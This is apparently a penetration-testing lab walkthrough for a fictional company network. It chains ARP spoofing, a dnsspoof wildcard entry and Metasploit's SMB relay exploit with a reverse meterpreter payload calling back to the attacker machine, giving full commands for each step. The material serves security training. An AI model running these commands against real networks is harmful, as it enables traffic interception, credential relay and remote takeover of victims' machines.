DNS & SMB Relay Attack

overview

Scenario

dnsspoof
Metasploit

Recommended tools

How to use the SMB Relay Attack in order to compromise patched hosts.
How to use the dnsspoof tool in order to redirect systems to the host that you control.

What you will learn

Exploitation using SMB Relay Attack
Manipulating network traffic with dnsspoof

Goals

Content Image

The following image represents the LAB environment:

You are going to do an internal penetration test, where you will be connected directly into their LAN network 172.16.5.0/24. The scope in this test is only the 172.16.5.0/24 segment
You are in a production network, so you should not lock any user account by guessing their usernames and passwords

The assumptions of this security engagement are:

You are hired by a small company to perform a security assessment. Your customer is sportsfoo.com and they want your help to test the security of their environment, according to the scope below:

tasks

Launch an attack using the SMB Relay Exploit in a way that once the Client (172.16.5.5) issues a SMB connection to any hosts on the .sportsfoo.com domain it can be redirected to your Metasploit server, and then you can use its credentials to get a shell on the target machine (172.16.5.10*).

This is a graphic that represents how this attack should work:

Content Image

Client (Windows 7) issues a SMB connection to [\\fileserver.sportsfoo.com\finance$] at every 30 seconds or so.
The attacker machine intercepts this request and spoofs the IP address of fileserver.sportsfoo.com.
Then the Windows 7 system issues a SMB connection to [\\172.16.5.101] (attacker machine) instead of using the real IP of the fileserver.sportsfoo.com.
The SMB Relay exploit is already listening, receives the SMB connection, and relays the authentication to the target machine. The payload is a Windows Meterpreter shell.
Once the exploit authenticates on the target machine, a reverse meterpreter session is provided to the pentester.

Solutions

Step 1: Start msfconsole and configure the SMB Relay exploit: Commands:

msfconsole
use exploit/windows/smb/smb_relay
set SRVHOST 172.16.5.101
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 172.16.5.101
set SMBHOST 172.16.5.10
exploit

Content Image Step 2:Configurednsspoofin order to redirect the victim to our Metasploit system every time there's an SMB connection to any host in the domain:sportsfoo.com. Create a file with fake dns entry with all subdomains ofsportsfoo.compointing to our attacker machine.Command:

echo "172.16.5.101 *.sportsfoo.com" > dns

We are ready to rundnsspoof:Command:

dnsspoof -i eth1 -f dns

Content Image Step 3:Activate theMiTMattack using theARP Spoofingtechnique. Our goal is to poison the traffic between our victim,Windows 7at172.16.5.5, and the default gateway at172.16.5.1. In this way, we can manipulate the traffic usingdnsspoof, which is already running. In order to perform anARP Spoofingattack, we need to enable the IP forwarding as follow:Command:

echo 1 > /proc/sys/net/ipv4/ip_forward

In two separate terminals, start theARP Spoof attackagainst172.16.5.5and172.16.5.1using these commands:Commands:

arpspoof -i eth1 -t 172.16.5.5 172.16.5.1
arpspoof -i eth1 -t 172.16.5.1 172.16.5.5

Content Image Note: For further details, the ARP poisoning attack is covered in Poisoning & Sniffing (Lab10). So, every time the victim (Windows 7) starts anSMB connection,dnsspoofaligned with theARP Spoofattack, forges theDNSreplies telling that the searchedDNSaddress is hosted at the attacker machine: Content Image For example, from the previous results, Windows 7 has started an SMB connection for [\\fileserver.sportsfoo.com\AnyShare]. Then instead of getting a DNS response with the real IP address offileserver.sportsfoo.com, it received the IP of the attacker:172.16.5.101. Consequently, the SMB connection is hijacked to [\\172.16.5.101\AnyShare]. In Metasploit, every time there is an incomingSMBconnection, theSMB Relay exploitgrab theSMB hashes(credentials) and then uses them to get a shell on the target machine (172.16.5.10- since it was set in theSMBHOSTfield of thesmb-relayexploit). Content Image The SMB Relay attack was successful, and we were able to obtain a meterpreter session on the target machine. This was possible because the credentials used on the fileserver and the target machine are the same.Step 4:Interact with the meterpreter session.Commands:

sessions
sessions -i 1
getuid

Content Image In this lab, we were able to trick the client by spoofing DNS records, this, in turn, combined with SMB relay attack, provided us with a meterpreter session on the target machine with administrative privileges.

PreviousLinux Exploitation: Lab 1 - Remote Enumeration NextMSSQL DB User Impersonation to RCE

Last updated 10 months ago